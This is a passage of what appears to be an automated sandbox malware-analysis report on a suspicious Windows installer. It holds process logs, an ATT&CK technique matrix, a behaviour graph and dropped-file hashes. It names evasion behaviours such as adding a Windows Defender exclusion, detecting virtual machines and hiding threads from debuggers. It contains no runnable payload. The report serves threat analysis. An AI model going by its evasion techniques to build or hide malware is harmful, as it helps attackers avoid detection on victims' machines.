Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CAE5720 cpuid 6_2_6CAE5720
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0018AB2A GetSystemTimeAsFileTime,9_2_0018AB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00220090 GetVersion,9_2_00220090
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2036424385.0000000000FF1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Windows Defender\MsMpEng.exe
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation
1
Windows Service
1
Access Token Manipulation
11
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter
1
DLL Side-Loading
1
Windows Service
1
Disable or Modify Tools
LSASS Memory341
Security Software Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Service Execution
Logon Script (Windows)111
Process Injection
241
Virtualization/Sandbox Evasion
Security Account Manager241
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
Native API
Login Hook1
DLL Side-Loading
1
Access Token Manipulation
NTDS2
Process Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
Process Injection
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Deobfuscate/Decode Files or Information
Cached Domain Credentials2
System Owner/User Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
Obfuscated Files or Information
DCSync3
File and Directory Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Software Packing
Proc Filesystem45
System Information Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
DLL Side-Loading
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1579419 Sample: #U8f6f#U4ef6#U5305#U5b89#U8... Startdate: 22/12/2024 Architecture: WINDOWS Score: 80 104 Found driver which could be used to inject code into processes 2->104 106 PE file contains section with special chars 2->106 108 AI detected suspicious sample 2->108 110 Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet 2->110 10 #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe 2 2->10         started        13 cmd.exe 2->13         started        15 cmd.exe 2->15         started        17 28 other processes 2->17 process3 file4 102 #U8f6f#U4ef6#U5305...a0b#U5e8f_1.0.4.tmp, PE32 10->102 dropped 19 #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp 3 5 10->19         started        23 sc.exe 1 13->23         started        25 sc.exe 15->25         started        27 conhost.exe 15->27         started        29 sc.exe 1 17->29         started        31 sc.exe 1 17->31         started        33 sc.exe 1 17->33         started        35 24 other processes 17->35 process5 file6 86 C:\Users\user\AppData\Local\...\update.vac, PE32 19->86 dropped 88 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 19->88 dropped 112 Adds a directory exclusion to Windows Defender 19->112 37 #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe 2 19->37         started        40 powershell.exe 23 19->40         started        43 conhost.exe 23->43         started        45 conhost.exe 23->45         started        47 conhost.exe 25->47         started        49 conhost.exe 29->49         started        51 conhost.exe 31->51         started        53 conhost.exe 33->53         started        55 24 other processes 35->55 signatures7 process8 file9 90 #U8f6f#U4ef6#U5305...a0b#U5e8f_1.0.4.tmp, PE32 37->90 dropped 57 #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp 4 16 37->57         started        114 Loading BitLocker PowerShell Module 40->114 61 conhost.exe 40->61         started        63 WmiPrvSE.exe 40->63         started        65 sc.exe 43->65         started        67 sc.exe 43->67         started        signatures10 process11 file12 94 C:\Users\user\AppData\Local\...\update.vac, PE32 57->94 dropped 96 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 57->96 dropped 98 C:\Program Files (x86)\...\updat4.vac, PE32 57->98 dropped 100 3 other files (none is malicious) 57->100 dropped 116 Query firmware table information (likely to detect VMs) 57->116 118 Protects its processes via BreakOnTermination flag 57->118 120 Hides threads from debuggers 57->120 122 Contains functionality to hide a thread from the debugger 57->122 69 7zr.exe 2 57->69         started        72 7zr.exe 6 57->72         started        74 cmd.exe 57->74         started        78 2 other processes 57->78 76 conhost.exe 65->76         started        signatures13 process14 file15 92 C:\Program Files (x86)\...\tProtect.dll, PE32+ 69->92 dropped 80 conhost.exe 69->80         started        82 conhost.exe 72->82         started        84 sc.exe 1 74->84         started        process16

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe6%VirustotalBrowse
#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe0%ReversingLabs
SourceDetectionScannerLabelLink
C:\Program Files (x86)\Windows NT\7zr.exe0%ReversingLabs
C:\Program Files (x86)\Windows NT\is-0C2B4.tmp0%ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll3%ReversingLabs
C:\Program Files (x86)\Windows NT\trash (copy)0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-C426E.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-SND3J.tmp\_isetup\_setup64.tmp0%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.210.172
truefalse
    high
    NameSourceMaliciousAntivirus DetectionReputation
    https://aria2.github.io/Usage:#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.drfalse
      unknown
      https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exefalse
        high
        https://github.com/aria2/aria2/issuesReport#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.drfalse
          high
          http://www.metalinker.org/#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.drfalse
            unknown
            https://www.remobjects.com/ps#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1796173002.0000000002C60000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1796644119.000000007F1EB000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000000.1798850894.0000000000BE1000.00000020.00000001.01000000.00000004.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000000.1861362559.000000000086D000.00000020.00000001.01000000.00000008.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.drfalse
              high
              https://aria2.github.io/#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.drfalse
                unknown
                https://github.com/aria2/aria2/issues#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.drfalse
                  high
                  https://www.innosetup.com/#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1796173002.0000000002C60000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1796644119.000000007F1EB000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000000.1798850894.0000000000BE1000.00000020.00000001.01000000.00000004.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000000.1861362559.000000000086D000.00000020.00000001.01000000.00000008.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.drfalse
                    high
                    http://www.metalinker.org/basic_string::_M_construct#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.drfalse
                      unknown
                      No contacted IP infos
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1579419
                      Start date and time:2024-12-22 09:44:03 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 10m 26s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Run name:Run with higher sleep bypass
                      Number of analysed new started processes analysed:110
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Critical Process Termination
                      Sample name:#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
                      renamed because original name is a hash value
                      Original Sample Name:_1.0.4.exe
                      Detection:MAL
                      Classification:mal80.evad.winEXE@126/32@0/0
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 74%
                      • Number of executed functions: 121
                      • Number of non-executed functions: 111
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                      • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                      • Exclude process from analysis (whitelisted): Conhost.exe, SIHClient.exe
                      • Excluded IPs from analysis (whitelisted): 172.202.163.200, 40.69.42.241
                      • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, dns.msftncsi.com, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      No simulations
                      No context
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      bg.microsoft.map.fastly.netRechnung736258.pdf.lnkGet hashmaliciousLummaCBrowse
                      • 199.232.214.172
                      Company Information.pdf.lnkGet hashmaliciousUnknownBrowse
                      • 199.232.210.172
                      Navan - Itinerary.pdf.scr.exeGet hashmaliciousLummaCBrowse
                      • 199.232.210.172
                      HX Design.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                      • 199.232.210.172
                      1734733987ee1a8345da831d1ecbca38d8a0fdc4854f6779b69f21209db7e0a6d5a2d91fd2237.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                      • 199.232.210.172
                      1734732186278e5c87d1a316617c1125acd5c32aedeebfd021b1e761647265ea7426c527bd565.dat-decoded.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                      • 199.232.214.172
                      Statements.pdfGet hashmaliciousWinSearchAbuseBrowse
                      • 199.232.210.172
                      INVOICE_2279_from_RealEyes Digital LLC (1).pdfGet hashmaliciousUnknownBrowse
                      • 199.232.214.172
                      Z8oTIWCyDE.exeGet hashmaliciousLummaCBrowse
                      • 199.232.210.172
                      BB4S2ErvqK.exeGet hashmaliciousLummaCBrowse
                      • 199.232.214.172
                      No context
                      No context
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      C:\Program Files (x86)\Windows NT\7zr.exeekTL8jTI4D.msiGet hashmaliciousUnknownBrowse
                        Process:C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):831200
                        Entropy (8bit):6.671005303304742
                        Encrypted:false
                        SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                        MD5:84DC4B92D860E8AEA55D12B1E87EA108
                        SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                        SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                        SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Joe Sandbox View:
                        • Filename: ekTL8jTI4D.msi, Detection: malicious, Browse
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................
                        Process:C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        File Type:data
                        Category:dropped
                        Size (bytes):249968
                        Entropy (8bit):7.999303164107087
                        Encrypted:true
                        SSDEEP:6144:kCH0RnlXrWzuIqJSkqQQhY1il1J4TpHQQh:d0RnlXDPqQGY1s1JuHQQh
                        MD5:2362DBE94C48B5F9BEC71C9C0A2AB15A
                        SHA1:B1A57A8FCC57D0230B5AD2CB56BBBD4DDFC9E1C9
                        SHA-256:D17B942BE633F5DE2C57DA7A62B0A788D85DCAFA6C9BA48CCBFB6FD403277288
                        SHA-512:7FC92664D53E2E5D8F624F4AF6E902B1ECD86EFF03F8192AF09FDC5899576DDA9EC8F7DC4906237207AB758EFF4142A19DA2D8622BD329A0AA7324CC307FE695
                        Malicious:false
                        Preview:.@S.....?..,................H..v\t4..{@.Ae.RIm...w..8Q.........G..W..7..x.mX.-....Yg..x.2"l..,...yFP;...D?b.......m...!(M.Y..5.*qk..3.j.U.2......!i..$.s.I.W..i.......zQ....X..E*o.I.._..>"...O.@....S8..L1X.P....3_.C.,H`.........zmp ...x..........4_...E.`X{7.T.@e.1.>...v. .......u8.;...z...w...n.....v*.....o%...v.N](....P..2...z..G.r.^.;U/...kN....1tEn.i..F....q.u..y[.....B..%C.S3..X....B....&H.e....o.T..{...=.+6uq._..y.....i.7.%"w#...I...k.n.5..r.'l....u.......m.M.v.6.}.....U.*Jp<.}.?k... .$.*./.f!R......N....Sr......ys..&....m...'PG.:c...*f.7.....v.j.'.4.'W..$.F.g......LV...FL!!4.$QG.K..v..SZv.....{a..,u.%..{9....~MR.>..e.<.......20..GI.........x..IB.n5..C.G....@w..a......[.R.a.Y Np."........*.b...m..4P...1C...M....*.{>^..e...-c..N.BS.e...*.Wr.a._......V.Y..D.l..<;.HZ'.\.../..G.i.=......*..k...h..j.....r.%+!.V...p.vgQf....Z*.h<.Q[~g..}^.iH]..........J.<....<K.G.(.C....`....ry.....v..Wu>....r1u..ZA.".d..LAQ.F..._...#..Y&.....~.J...
                        Process:C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                        Category:dropped
                        Size (bytes):5649408
                        Entropy (8bit):6.392614480390128
                        Encrypted:false
                        SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                        MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                        SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                        SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                        SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                        Process:C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        File Type:data
                        Category:dropped
                        Size (bytes):249968
                        Entropy (8bit):7.999303164107087
                        Encrypted:true
                        SSDEEP:6144:kCH0RnlXrWzuIqJSkqQQhY1il1J4TpHQQh:d0RnlXDPqQGY1s1JuHQQh
                        MD5:2362DBE94C48B5F9BEC71C9C0A2AB15A
                        SHA1:B1A57A8FCC57D0230B5AD2CB56BBBD4DDFC9E1C9
                        SHA-256:D17B942BE633F5DE2C57DA7A62B0A788D85DCAFA6C9BA48CCBFB6FD403277288
                        SHA-512:7FC92664D53E2E5D8F624F4AF6E902B1ECD86EFF03F8192AF09FDC5899576DDA9EC8F7DC4906237207AB758EFF4142A19DA2D8622BD329A0AA7324CC307FE695
                        Malicious:false
